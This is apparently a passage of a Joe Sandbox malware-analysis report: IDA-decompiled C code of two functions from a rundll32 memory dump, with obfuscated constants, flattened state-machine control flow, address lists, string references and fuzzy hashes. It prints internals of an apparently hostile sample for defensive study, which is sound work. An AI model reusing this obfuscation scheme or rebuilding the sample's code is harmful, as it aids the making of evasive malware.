				signed int _v1784;
				signed int _v1788;
				signed int _v1792;
				void* _t364;
				void* _t401;
				signed int _t407;
				signed int _t408;
				void* _t418;
				signed int _t424;
				void* _t467;
				signed int _t477;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				signed int _t482;
				signed int _t483;
				signed int _t484;
				signed int _t485;
				signed int _t486;
				signed int _t487;
				signed int _t488;
				signed int _t489;
				intOrPtr* _t492;
				signed int* _t494;

				_push(_a24);
				_t492 = __ecx;
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00442550(_t364);
				_v1640 = _v1640 & 0x00000000;
				_t494 =  &(( &_v1792)[8]);
				_v1652 = 0x2764d0;
				_v1648 = 0x6c10e;
				_t418 = 0x1a59bf6e;
				_v1644 = 0x45b7d3;
				_v1736 = 0x69d7;
				_t479 = 0x7c;
				_v1736 = _v1736 / _t479;
				_v1736 = _v1736 ^ 0x22ae46e4;
				_v1736 = _v1736 ^ 0x22ae462e;
				_v1692 = 0x6229;
				_t480 = 0x2d;
				_v1692 = _v1692 * 0x79;
				_v1692 = _v1692 ^ 0x002e5d85;
				_v1668 = 0x3eca;
				_v1668 = _v1668 * 0x4a;
				_v1668 = _v1668 ^ 0x001246b9;
				_v1664 = 0xb443;
				_v1664 = _v1664 ^ 0x9e62129a;
				_v1664 = _v1664 ^ 0x9e62966b;
				_v1776 = 0xc910;
				_v1776 = _v1776 ^ 0xd3b19c76;
				_v1776 = _v1776 * 0x5f;
				_v1776 = _v1776 >> 4;
				_v1776 = _v1776 ^ 0x08ec90a2;
				_v1724 = 0x4482;
				_v1724 = _v1724 | 0x42708b7b;
				_v1724 = _v1724 + 0xddd;
				_v1724 = _v1724 ^ 0x4270d568;
				_v1688 = 0xa58d;
				_v1688 = _v1688 / _t480;
				_v1688 = _v1688 ^ 0x00002f12;
				_v1768 = 0x1117;
				_v1768 = _v1768 ^ 0xb27fbd06;
				_v1768 = _v1768 ^ 0xbad7b42c;
				_v1768 = _v1768 << 5;
				_v1768 = _v1768 ^ 0x1503361b;
				_v1748 = 0x59e9;
				_t481 = 0x76;
				_v1748 = _v1748 / _t481;
				_v1748 = _v1748 * 0x1b;
				_v1748 = _v1748 ^ 0x0000781f;
				_v1712 = 0x12f;
				_v1712 = _v1712 >> 1;
				_v1712 = _v1712 * 0x54;
				_v1712 = _v1712 ^ 0x000029cb;
				_v1760 = 0x769d;
				_v1760 = _v1760 ^ 0x1d97fecb;
				_v1760 = _v1760 | 0x5a049cf7;
				_v1760 = _v1760 >> 8;
				_v1760 = _v1760 ^ 0x005fdabd;
				_v1680 = 0x560a;
				_t482 = 0x67;
				_v1680 = _v1680 / _t482;
				_v1680 = _v1680 ^ 0x00006cbe;
				_v1716 = 0x4a9b;
				_t483 = 0x3e;
				_v1716 = _v1716 / _t483;
				_v1716 = _v1716 << 2;
				_v1716 = _v1716 ^ 0x00001699;
				_v1756 = 0xfd39;
				_t484 = 0x41;
				_v1756 = _v1756 / _t484;
				_t485 = 0x3c;
				_v1756 = _v1756 / _t485;
				_v1756 = _v1756 >> 2;
				_v1756 = _v1756 ^ 0x000009f3;
				_v1656 = 0x263f;
				_v1656 = _v1656 | 0xdd3deb07;
				_v1656 = _v1656 ^ 0xdd3d9735;
				_v1728 = 0x8b60;
				_v1728 = _v1728 + 0x7c61;
				_v1728 = _v1728 >> 3;
				_v1728 = _v1728 ^ 0x00004a7c;
				_v1720 = 0x33cd;
				_v1720 = _v1720 ^ 0x1b0fa94f;
				_v1720 = _v1720 >> 5;
				_v1720 = _v1720 ^ 0x00d8342d;
				_v1780 = 0x296b;
				_t477 = 0xd;
				_t486 = 0x1a;
				_v1780 = _v1780 * 0x37;
				_v1780 = _v1780 / _t477;
				_v1780 = _v1780 * 0x68;
				_v1780 = _v1780 ^ 0x00477104;
				_v1708 = 0x1071;
				_v1708 = _v1708 / _t486;
				_v1708 = _v1708 ^ 0x39e628e5;
				_v1708 = _v1708 ^ 0x39e60ecd;
				_v1792 = 0xc8ec;
				_v1792 = _v1792 + 0xffff9509;
				_v1792 = _v1792 << 0x10;
				_v1792 = _v1792 / _t477;
				_v1792 = _v1792 ^ 0x073a38a1;
				_v1672 = 0xf01f;
				_v1672 = _v1672 | 0x8a618a9f;
				_v1672 = _v1672 ^ 0x8a61a479;
				_v1772 = 0x51a6;
				_v1772 = _v1772 << 2;
				_t487 = 0x2c;
				_v1772 = _v1772 / _t487;
				_v1772 = _v1772 >> 5;
				_v1772 = _v1772 ^ 0x000035c3;
				_v1764 = 0xe721;
				_v1764 = _v1764 ^ 0x24f6807f;
				_t488 = 0x53;
				_v1764 = _v1764 / _t488;
				_v1764 = _v1764 + 0xbfd3;
				_v1764 = _v1764 ^ 0x00728456;
				_v1660 = 0x1e86;
				_v1660 = _v1660 ^ 0x7c17f37e;
				_v1660 = _v1660 ^ 0x7c17e05e;
				_v1684 = 0xd777;
				_v1684 = _v1684 + 0xed5a;
				_v1684 = _v1684 ^ 0x0001edaa;
				_v1744 = 0xa784;
				_v1744 = _v1744 + 0xc02;
				_t489 = 0x29;
				_v1744 = _v1744 / _t489;
				_v1744 = _v1744 ^ 0x000021c6;
				_v1696 = 0xdd82;
				_v1696 = _v1696 << 7;
				_v1696 = _v1696 ^ 0x006e89a7;
				_v1784 = 0x58c6;
				_v1784 = _v1784 << 0xd;
				_v1784 = _v1784 * 0x62;
				_v1784 = _v1784 ^ 0x296c6eed;
				_v1784 = _v1784 ^ 0x1615de11;
				_v1676 = 0x84dc;
				_v1676 = _v1676 << 1;
				_v1676 = _v1676 ^ 0x00016dc5;
				_v1740 = 0x8068;
				_v1740 = _v1740 | 0xa8a101a8;
				_v1740 = _v1740 >> 5;
				_v1740 = _v1740 ^ 0x0545556d;
				_v1732 = 0x2f98;
				_v1732 = _v1732 ^ 0x2890ad27;
				_v1732 = _v1732 >> 0xe;
				_v1732 = _v1732 ^ 0x0000a37e;
				_v1788 = 0x1e3f;
				_v1788 = _v1788 >> 5;
				_v1788 = _v1788 | 0x9899bc79;
				_v1788 = _v1788 ^ 0x98e78ce9;
				_v1788 = _v1788 ^ 0x007e0a8e;
				_v1700 = 0x100b;
				_v1700 = _v1700 | 0xf8dcacc8;
				_v1700 = _v1700 ^ 0xf8dcd529;
				_t478 = _v1700;
				_v1752 = 0x332;
				_v1752 = _v1752 << 0xb;
				_v1752 = _v1752 + 0x818f;
				_v1752 = _v1752 << 9;
				_v1752 = _v1752 ^ 0x342347ac;
				_v1704 = 0xaa58;
				_v1704 = _v1704 >> 8;
				_v1704 = _v1704 * 0x6a;
				_v1704 = _v1704 ^ 0x000062e9;
				while(1) {
					L1:
					_t467 = 0x2e;
					L2:
					while(_t418 != 0x15b4e3) {
						if(_t418 == 0xae29669) {
							__eflags = _v1636 & _v1736;
							if(__eflags == 0) {
								_t407 =  *_t492( &_v1636, _a12);
								asm("sbb ecx, ecx");
								_t424 =  ~_t407 & 0x021254c5;
								L9:
								_t418 = _t424 + 0x2bde9c80;
								while(1) {
									L1:
									_t467 = 0x2e;
									goto L2;
								}
							}
							__eflags = _v1592 - _t467;
							if(_v1592 != _t467) {
								L19:
								__eflags = _a20;
								if(__eflags != 0) {
									_push(0x4313dc);
									_push(_v1780);
									_push(_v1720);
									E0043A4D7(__eflags, _v1792, _v1672, _v1772, _v1764, E00435DFC(_v1656, _v1728, __eflags), _a24,  &_v524,  &_v1592);
									E0043D6F0(_t492, _v1660, _v1684, _v1744, _a12, _v1696, _a20,  &_v524);
									_t408 = E00440D6D(_v1784, _v1676, _v1740, _t411);
									_t494 =  &(_t494[0x13]);
									_t467 = 0x2e;
								}
								L18:
								_t418 = 0x2df0f145;
								continue;
							}
							__eflags = _v1590;
							if(__eflags == 0) {
								goto L18;
							}
							__eflags = _v1590 - _t467;
							if(_v1590 != _t467) {
								goto L19;
							}
							__eflags = _v1588;
							if(__eflags != 0) {
								goto L19;
							}
							goto L18;
						}
						if(_t418 == 0xe2dbff4) {
							_t408 = E00449952( &_v1636,  &_v1044, _v1716, _v1756);
							_t478 = _t408;
							__eflags = _t408 - 0xffffffff;
							if(__eflags == 0) {
								return _t408;
							}
							_t418 = 0xae29669;
							goto L1;
						}
						if(_t418 == 0x1a59bf6e) {
							_t418 = 0x15b4e3;
							continue;
						}
						if(_t418 == 0x2bde9c80) {
							return E0043991E(_v1700, _v1752, _t478, _v1704);
						}
						if(_t418 != 0x2df0f145) {
							L23:
							__eflags = _t418 - 0xd3f8960;
							if(__eflags != 0) {
								continue;
							}
							return _t408;
						}
						_t408 = E0043327F(_t478, _v1732,  &_v1636, _v1788);
						asm("sbb ecx, ecx");
						_t424 =  ~_t408 & 0xdf03f9e9;
						goto L9;
					}
					_push(0x43140c);
					_push(_v1776);
					_push(_v1664);
					_t401 = E00435DFC(_v1692, _v1668, __eflags);
					E0043ECBD(_v1724, __eflags, _v1692, _v1688, _v1768,  &_v1044, _v1748, _a24);
					E00440D6D(_v1712, _v1760, _v1680, _t401);
					_t494 =  &(_t494[0xb]);
					_t418 = 0xe2dbff4;
					_t467 = 0x2e;
					goto L23;
				}
			}

0x0043d6f9
0x0043d700
0x0043d702
0x0043d709
0x0043d710
0x0043d717
0x0043d71e
0x0043d725
0x0043d726
0x0043d727
0x0043d72c
0x0043d734
0x0043d737
0x0043d744
0x0043d74f
0x0043d754
0x0043d75f
0x0043d76d
0x0043d772
0x0043d778
0x0043d780
0x0043d788
0x0043d795
0x0043d798
0x0043d79c
0x0043d7a4
0x0043d7b7
0x0043d7be
0x0043d7c9
0x0043d7d4
0x0043d7df
0x0043d7ea
0x0043d7f2
0x0043d7ff
0x0043d803
0x0043d808
0x0043d810
0x0043d818
0x0043d820
0x0043d828
0x0043d830
0x0043d840
0x0043d844
0x0043d84c
0x0043d854
0x0043d85c
0x0043d864
0x0043d869
0x0043d871
0x0043d87d
0x0043d880
0x0043d889
0x0043d88d
0x0043d895
0x0043d89d
0x0043d8a6
0x0043d8aa
0x0043d8b2
0x0043d8ba
0x0043d8c2
0x0043d8ca
0x0043d8cf
0x0043d8d9
0x0043d8e7
0x0043d8ec
0x0043d8f0
0x0043d8f8
0x0043d906
0x0043d90b
0x0043d90f
0x0043d914
0x0043d91c
0x0043d92a
0x0043d92f
0x0043d939
0x0043d93e
0x0043d942
0x0043d947
0x0043d94f
0x0043d95a
0x0043d965
0x0043d970
0x0043d978
0x0043d980
0x0043d985
0x0043d98d
0x0043d995
0x0043d99d
0x0043d9a2
0x0043d9aa
0x0043d9b9
0x0043d9bc
0x0043d9bd
0x0043d9c9
0x0043d9d4
0x0043d9d8
0x0043d9e0
0x0043d9f0
0x0043d9f4
0x0043d9fc
0x0043da04
0x0043da0c
0x0043da14
0x0043da1f
0x0043da23
0x0043da2b
0x0043da36
0x0043da41
0x0043da4c
0x0043da54
0x0043da5f
0x0043da64
0x0043da6a
0x0043da6f
0x0043da77
0x0043da7f
0x0043da8b
0x0043da90
0x0043da96
0x0043da9e
0x0043daa6
0x0043dab1
0x0043dabc
0x0043dac7
0x0043dacf
0x0043dad7
0x0043dadf
0x0043dae7
0x0043daf3
0x0043daf6
0x0043dafa
0x0043db02
0x0043db0a
0x0043db0f
0x0043db17
0x0043db1f
0x0043db29
0x0043db2d
0x0043db35
0x0043db3d
0x0043db48
0x0043db4f
0x0043db5a
0x0043db62
0x0043db6a
0x0043db6f
0x0043db77
0x0043db7f
0x0043db87
0x0043db8c
0x0043db94
0x0043db9c
0x0043dba1
0x0043dba9
0x0043dbb1
0x0043dbb9
0x0043dbc1
0x0043dbc9
0x0043dbd1
0x0043dbd5
0x0043dbdd
0x0043dbe2
0x0043dbea
0x0043dbef
0x0043dbf7
0x0043dbff
0x0043dc09
0x0043dc0d
0x0043dc15
0x0043dc15
0x0043dc17
0x00000000
0x0043dc18
0x0043dc2a
0x0043dcc2
0x0043dcc9
0x0043ddcb
0x0043ddd1
0x0043ddd3
0x0043dc7d
0x0043dc7d
0x0043dc15
0x0043dc15
0x0043dc17
0x00000000
0x0043dc17
0x0043dc15
0x0043dccf
0x0043dcd7
0x0043dd03
0x0043dd03
0x0043dd0b
0x0043dd0d
0x0043dd12
0x0043dd16
0x0043dd61
0x0043dd97
0x0043ddac
0x0043ddb1
0x0043ddb6
0x0043ddb6
0x0043dcf9
0x0043dcf9
0x00000000
0x0043dcf9
0x0043dcd9
0x0043dce2
0x00000000
0x00000000
0x0043dce4
0x0043dcec
0x00000000
0x00000000
0x0043dcee
0x0043dcf7
0x00000000
0x00000000
0x00000000
0x0043dcf7
0x0043dc36
0x0043dca2
0x0043dca7
0x0043dcab
0x0043dcae
0x0043de78
0x0043de78
0x0043dcb4
0x00000000
0x0043dcb4
0x0043dc3e
0x0043dc85
0x00000000
0x0043dc85
0x0043dc46
0x00000000
0x0043de6e
0x0043dc52
0x0043de4d
0x0043de4d
0x0043de53
0x00000000
0x00000000
0x00000000
0x0043de53
0x0043dc6a
0x0043dc75
0x0043dc77
0x00000000
0x0043dc77
0x0043ddde
0x0043dde3
0x0043dde7
0x0043ddf9
0x0043de28
0x0043de3d
0x0043de42
0x0043de45
0x0043de4c
0x00000000
0x0043de4c

Strings

)b, xrefs: 0043D788
!, xrefs: 0043DA77
Y, xrefs: 0043D871
k), xrefs: 0043D9AA
?&, xrefs: 0043D94F
Z, xrefs: 0043DACF
(9, xrefs: 0043D9F4
b, xrefs: 0043DC0D
|J, xrefs: 0043D985
nl), xrefs: 0043DB2D

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: !$)b$?&$Z$k)$|J$(9$Y$b$nl)
API String ID: 0-1587503975
Opcode ID: 1a1b4fec293a0c5df6ce93050c84aea5870d5a79be7add5714449ec74754654e
Instruction ID: ca23b3ae20da9d7aee3050b8e0d82b242e3d1850a2b94a426c47ed53b71f100b
Opcode Fuzzy Hash: 1a1b4fec293a0c5df6ce93050c84aea5870d5a79be7add5714449ec74754654e
Instruction Fuzzy Hash: D502447150C3809FE328CF25D54AA5BBBE1FBC8748F10991EF19A862A0D7B98549CF47

Uniqueness

Uniqueness Score: -1.00%

Function 0044AA7B, Relevance: 12.9, Strings: 10, Instructions: 360
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E0044AA7B(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				char _v1;
				char _v96;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char* _v124;
				char _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				void* _t311;
				intOrPtr _t340;
				intOrPtr _t341;
				void* _t342;
				void* _t344;
				intOrPtr _t346;
				signed int _t348;
				signed int _t352;
				intOrPtr* _t360;
				signed int _t362;
				intOrPtr* _t366;
				intOrPtr _t368;
				intOrPtr* _t373;
				char* _t403;
				signed int _t405;
				signed int _t406;
				signed int _t407;
				signed int _t408;
				signed int _t409;
				signed int _t410;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				char* _t414;
				void* _t415;
				intOrPtr* _t422;
				void* _t424;
				void* _t426;

				_t366 = _a8;
				_push(_t366);
				_push(_a4);
				_t422 = __ecx;
				_push(__edx);
				_push(__ecx);
				E00442550(_t311);
				_v240 = 0x8d7c;
				_t424 =  &_v252 + 0x10;
				_t368 = 0;
				_t415 = 0x41ccc75;
				_v252 = 0;
				_t405 = 0x25;
				_v240 = _v240 / _t405;
				_t406 = 0x2f;
				_v240 = _v240 / _t406;
				_v240 = _v240 << 2;
				_v240 = _v240 ^ 0x00000010;
				_v224 = 0x614;
				_v224 = _v224 + 0xffff1e90;
				_v224 = _v224 >> 9;
				_v224 = _v224 + 0x14db;
				_v224 = _v224 ^ 0x0080146f;
				_v168 = 0x43df;
				_v168 = _v168 + 0xffffc722;
				_v168 = _v168 ^ 0xb717614c;
				_v168 = _v168 ^ 0xb71706dd;
				_v176 = 0xf537;
				_v176 = _v176 + 0xffffdb03;
				_v176 = _v176 | 0xc83cfdf5;
				_v176 = _v176 ^ 0xc83cf680;
				_v156 = 0x6ab9;
				_v156 = _v156 >> 4;
				_v156 = _v156 ^ 0x00005a76;
				_v212 = 0x1163;
				_v212 = _v212 + 0xb834;
				_v212 = _v212 | 0x5ab100ea;
				_v212 = _v212 << 0x10;
				_v212 = _v212 ^ 0xc9ff2941;
				_v184 = 0x14b7;
				_v184 = _v184 + 0xffff4460;
				_v184 = _v184 >> 9;
				_v184 = _v184 ^ 0x007fa2da;
				_v220 = 0xa2fe;
				_v220 = _v220 ^ 0x26ae9f9f;
				_v220 = _v220 + 0x1a1;
				_v220 = _v220 + 0xce68;
				_v220 = _v220 ^ 0x26af665c;
				_v228 = 0x162a;
				_v228 = _v228 ^ 0x1700eeb5;
				_v228 = _v228 << 1;
				_v228 = _v228 ^ 0x4a6b2f0a;
				_v228 = _v228 ^ 0x646a9864;
				_v136 = 0x1819;
				_v136 = _v136 * 0x25;
				_v136 = _v136 ^ 0x000331ed;
				_v160 = 0x36ca;
				_v160 = _v160 ^ 0xc92c8b7e;
				_v160 = _v160 ^ 0xc92cce0d;
				_v148 = 0xc5b6;
				_v148 = _v148 * 0x7e;
				_v148 = _v148 ^ 0x00614dee;
				_v140 = 0xa97e;
				_v140 = _v140 + 0xa055;
				_v140 = _v140 ^ 0x000126a3;
				_v172 = 0xe032;
				_v172 = _v172 * 0x70;
				_v172 = _v172 << 9;
				_v172 = _v172 ^ 0xc42bfcc6;
				_v216 = 0xe61f;
				_v216 = _v216 | 0xbe443d33;
				_v216 = _v216 ^ 0x414ec713;
				_t407 = 0x43;
				_v216 = _v216 / _t407;
				_v216 = _v216 ^ 0x03ce199c;
				_v192 = 0x9a2f;
				_v192 = _v192 | 0xaa1149b7;
				_v192 = _v192 ^ 0x2682361c;
				_v192 = _v192 ^ 0x8c93a9a4;
				_v152 = 0x8d56;
				_t408 = 0x7f;
				_v152 = _v152 * 0x29;
				_v152 = _v152 ^ 0x0016ef6a;
				_v236 = 0xbc0b;
				_v236 = _v236 << 0xd;
				_v236 = _v236 + 0xffff7a12;
				_v236 = _v236 << 6;
				_v236 = _v236 ^ 0xe036fcaf;
				_v144 = 0x49e;
				_v144 = _v144 / _t408;
				_v144 = _v144 ^ 0x000069ed;
				_v244 = 0x2abb;
				_t409 = 0x6f;
				_v244 = _v244 / _t409;
				_v244 = _v244 + 0xffff3ff3;
				_v244 = _v244 << 7;
				_v244 = _v244 ^ 0xffa00c82;
				_v232 = 0x26d8;
				_v232 = _v232 + 0xffffe69b;
				_v232 = _v232 + 0x4f22;
				_t410 = 0x3c;
				_v232 = _v232 / _t410;
				_v232 = _v232 ^ 0x00004984;
				_v188 = 0x4ffd;
				_v188 = _v188 | 0xb7e6561e;
				_v188 = _v188 >> 0xc;
				_v188 = _v188 ^ 0x000b053b;
				_v180 = 0x9e1b;
				_v180 = _v180 + 0xffffc996;
				_v180 = _v180 | 0x10dfcda5;
				_v180 = _v180 ^ 0x10dfd69b;
				_v196 = 0x4e8f;
				_t411 = 0x74;
				_v196 = _v196 / _t411;
				_v196 = _v196 + 0xe77b;
				_v196 = _v196 ^ 0x0000e576;
				_v132 = 0xd692;
				_t412 = 0x77;
				_v132 = _v132 / _t412;
				_v132 = _v132 ^ 0x0000067d;
				_v164 = 0xe38a;
				_t413 = 0x1d;
				_t414 = _v124;
				_v164 = _v164 / _t413;
				_v164 = _v164 ^ 0x0000547b;
				_v208 = 0x28b1;
				_v208 = _v208 + 0xffff4814;
				_v208 = _v208 << 9;
				_v208 = _v208 ^ 0xfee1d162;
				_v200 = 0x7d21;
				_v200 = _v200 ^ 0x0b7eb81b;
				_v200 = _v200 | 0x5335bde4;
				_v200 = _v200 ^ 0x5b7f914c;
				_v204 = 0xd16;
				_v204 = _v204 + 0xffff7a95;
				_v204 = _v204 + 0xffffd877;
				_v204 = _v204 ^ 0xffff6023;
				while(1) {
					L1:
					_t398 = _v248;
					do {
						while(1) {
							L2:
							_t426 = _t415 - 0x994cea2;
							if(_t426 > 0) {
								break;
							}
							if(_t426 == 0) {
								E00440FE4(_t368, _v128);
								_t415 = 0x15dfcb81;
								goto L9;
							} else {
								if(_t415 == 0x1d2cb9a) {
									_v116 = 0x6c;
									_t340 =  *0x450400; // 0x0
									_t341 =  *0x450400; // 0x0
									_t342 = E0044C3F6(_v236, _v240,  *((intOrPtr*)(_t341 + 0x18)), _v204, _v144, _v244, _v232, _v188,  *((intOrPtr*)(_t340 + 0x10)),  &_v108,  &_v116);
									_t424 = _t424 + 0x24;
									if(_t342 == 0) {
										_t415 = 0x994cea2;
									} else {
										_t373 =  &_v1;
										_t403 = _t414;
										do {
											 *_t403 =  *_t373;
											_t403 = _t403 + 1;
											_t373 = _t373 - 1;
										} while (_t373 >=  &_v96);
										_t415 = 0x479469f;
									}
									goto L9;
								} else {
									if(_t415 == 0x41ccc75) {
										_t415 = 0x2c907ec6;
										continue;
									} else {
										if(_t415 == 0x479469f) {
											_v112 = 0x14;
											_t263 = _t414 + 0x60; // 0x60
											_t344 = E004397D9(_t263, _v128, _t368, _v180,  &_v112, _v196, _v132, _v224, _v164);
											_t368 = _v252;
											_t424 = _t424 + 0x1c;
											_t398 = _v248;
											if(_t344 == 0) {
												continue;
											} else {
												_t415 = 0x994cea2;
												_t368 = 1;
												_v252 = 1;
												goto L1;
											}
											L34:
										} else {
											if(_t415 != 0x65513b8) {
												goto L32;
											} else {
												_t346 =  *0x450400; // 0x0
												_t348 = E004431B5(_v124,  &_v120, _v140, _v172, _v128, _v216, _t368, _t398, _v192, _v152,  *((intOrPtr*)(_t346 + 0x10)));
												_t424 = _t424 + 0x28;
												asm("sbb esi, esi");
												_t415 = ( ~_t348 & 0xf83dfcf8) + 0x994cea2;
												L9:
												_t368 = _v252;
												while(1) {
													L1:
													_t398 = _v248;
													goto L2;
												}
											}
										}
									}
								}
							}
							goto L33;
						}
						if(_t415 == 0x15dfcb81) {
							if(_t368 == 0) {
								E0043DE81(_v156,  *_t366, _v212);
								_t368 = _v252;
							}
							_t415 = 0x1160f48c;
							goto L32;
						} else {
							if(_t415 == 0x269afaf2) {
								E00436374(_v160, _t398, _a4,  *_t422, _v148);
								_t424 = _t424 + 0xc;
								_t415 = 0x65513b8;
								goto L9;
							} else {
								if(_t415 == 0x2c907ec6) {
									_t352 = _a4 + 1;
									if((_t352 & 0x0000000f) != 0) {
										_t352 = (_t352 & 0xfffffff0) + 0x10;
									}
									 *((intOrPtr*)(_t366 + 4)) = _t352 + 0x74;
									_push(_t368);
									_t414 = E004354FB( *((intOrPtr*)(_t366 + 4)));
									 *_t366 = _t414;
									if(_t414 != 0) {
										_t297 = _t414 + 0x74; // 0x74
										_t398 = _t297;
										_t368 = _v252;
										_t415 = 0x3b15e045;
										_v120 = _a4;
										_v248 = _t297;
										_v124 =  *((intOrPtr*)(_t366 + 4)) - 0x74;
										goto L2;
									}
								} else {
									if(_t415 != 0x3b15e045) {
										goto L32;
									} else {
										_t360 =  *0x450400; // 0x0
										_t362 = E004372A4(_v184,  &_v128, _v220, _v228, _t368, _v136,  *_t360);
										_t424 = _t424 + 0x18;
										asm("sbb esi, esi");
										_t415 = ( ~_t362 & 0x10bb2f71) + 0x15dfcb81;
										goto L9;
									}
								}
							}
						}
						break;
						L32:
						_t398 = _v248;
					} while (_t415 != 0x1160f48c);
					L33:
					return _v252;
					goto L34;
				}
			}

0x0044aa82
0x0044aa8c
0x0044aa8d
0x0044aa94
0x0044aa96
0x0044aa97
0x0044aa98
0x0044aa9d
0x0044aaa5
0x0044aaae
0x0044aab0
0x0044aab5
0x0044aabb
0x0044aac0
0x0044aaca
0x0044aacd
0x0044aad1
0x0044aad6
0x0044aadb
0x0044aae3
0x0044aaeb
0x0044aaf0
0x0044aaf8
0x0044ab00
0x0044ab08
0x0044ab10
0x0044ab18
0x0044ab20
0x0044ab28
0x0044ab30
0x0044ab38
0x0044ab40
0x0044ab48
0x0044ab4d
0x0044ab55
0x0044ab5d
0x0044ab65
0x0044ab6d
0x0044ab72
0x0044ab7a
0x0044ab82
0x0044ab8a
0x0044ab8f
0x0044ab97
0x0044ab9f
0x0044aba7
0x0044abaf
0x0044abb7
0x0044abbf
0x0044abc7
0x0044abcf
0x0044abd3
0x0044abdb
0x0044abe3
0x0044abf6
0x0044abfd
0x0044ac08
0x0044ac10
0x0044ac18
0x0044ac20
0x0044ac2d
0x0044ac31
0x0044ac39
0x0044ac44
0x0044ac4f
0x0044ac5a
0x0044ac67
0x0044ac6d
0x0044ac72
0x0044ac7a
0x0044ac82
0x0044ac8a
0x0044ac98
0x0044ac9d
0x0044aca3
0x0044acab
0x0044acb3
0x0044acbb
0x0044acc3
0x0044accb
0x0044acd8
0x0044acdb
0x0044acdf
0x0044ace7
0x0044acef
0x0044acf4
0x0044acfc
0x0044ad01
0x0044ad09
0x0044ad1f
0x0044ad26
0x0044ad31
0x0044ad3d
0x0044ad42
0x0044ad48
0x0044ad50
0x0044ad55
0x0044ad5d
0x0044ad65
0x0044ad6d
0x0044ad79
0x0044ad7e
0x0044ad84
0x0044ad8c
0x0044ad94
0x0044ad9c
0x0044ada1
0x0044ada9
0x0044adb1
0x0044adb9
0x0044adc1
0x0044adc9
0x0044add5
0x0044adda
0x0044ade0
0x0044ade8
0x0044adf0
0x0044ae02
0x0044ae05
0x0044ae0c
0x0044ae17
0x0044ae27
0x0044ae2a
0x0044ae31
0x0044ae35
0x0044ae3d
0x0044ae45
0x0044ae4d
0x0044ae52
0x0044ae5a
0x0044ae62
0x0044ae6a
0x0044ae72
0x0044ae7a
0x0044ae82
0x0044ae8a
0x0044ae92
0x0044ae9a
0x0044ae9a
0x0044ae9a
0x0044ae9e
0x0044ae9e
0x0044ae9e
0x0044ae9e
0x0044aea4
0x00000000
0x00000000
0x0044aeaa
0x0044b031
0x0044b037
0x00000000
0x0044aeb0
0x0044aeb6
0x0044afa5
0x0044afb9
0x0044afd8
0x0044afe8
0x0044afed
0x0044aff2
0x0044b018
0x0044aff4
0x0044aff4
0x0044affb
0x0044affd
0x0044afff
0x0044b001
0x0044b002
0x0044b00a
0x0044b00e
0x0044b00e
0x00000000
0x0044aebc
0x0044aec2
0x0044af94
0x00000000
0x0044aec8
0x0044aece
0x0044af41
0x0044af68
0x0044af6b
0x0044af70
0x0044af74
0x0044af77
0x0044af7d
0x00000000
0x0044af83
0x0044af85
0x0044af8a
0x0044af8b
0x00000000
0x0044af8b
0x00000000
0x0044aed0
0x0044aed6
0x00000000
0x0044aedc
0x0044aedc
0x0044af13
0x0044af18
0x0044af1f
0x0044af27
0x0044af2d
0x0044af2d
0x0044ae9a
0x0044ae9a
0x0044ae9a
0x00000000
0x0044ae9a
0x0044ae9a
0x0044aed6
0x0044aece
0x0044aec2
0x0044aeb6
0x00000000
0x0044aeaa
0x0044b047
0x0044b12b
0x0044b137
0x0044b13d
0x0044b13d
0x0044b141
0x00000000
0x0044b04d
0x0044b053
0x0044b117
0x0044b11c
0x0044b11f
0x00000000
0x0044b059
0x0044b05f
0x0044b0b2
0x0044b0b5
0x0044b0ba
0x0044b0ba
0x0044b0c0
0x0044b0ce
0x0044b0d4
0x0044b0d6
0x0044b0db
0x0044b0e0
0x0044b0e0
0x0044b0e3
0x0044b0e7
0x0044b0ec
0x0044b0f9
0x0044b0fd
0x00000000
0x0044b0fd
0x0044b061
0x0044b067
0x00000000
0x0044b06d
0x0044b06d
0x0044b090
0x0044b095
0x0044b09c
0x0044b0a4
0x00000000
0x0044b0a4
0x0044b067
0x0044b05f
0x0044b053
0x00000000
0x0044b146
0x0044b146
0x0044b14a
0x0044b156
0x0044b164
0x00000000
0x0044b164

Strings

/kJ, xrefs: 0044ABD3
2, xrefs: 0044AC5A
l, xrefs: 0044AFA5
!}, xrefs: 0044AE5A
i, xrefs: 0044AD26
{T, xrefs: 0044AE35
vZ, xrefs: 0044AB4D
"O, xrefs: 0044AD6D
Ma, xrefs: 0044AC31
v, xrefs: 0044ADE8

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: /kJ$!}$"O$2$l$vZ$v${T$Ma$i
API String ID: 0-820926959
Opcode ID: 54fa073e2915acf2836def45c3f5c0183532fa6a52f1e6e943d45d884435b247
Instruction ID: 79e038450732f4bc11e7c60a231bdc44b58b9b6c11d4794a4037fe346c211a1d
Opcode Fuzzy Hash: 54fa073e2915acf2836def45c3f5c0183532fa6a52f1e6e943d45d884435b247
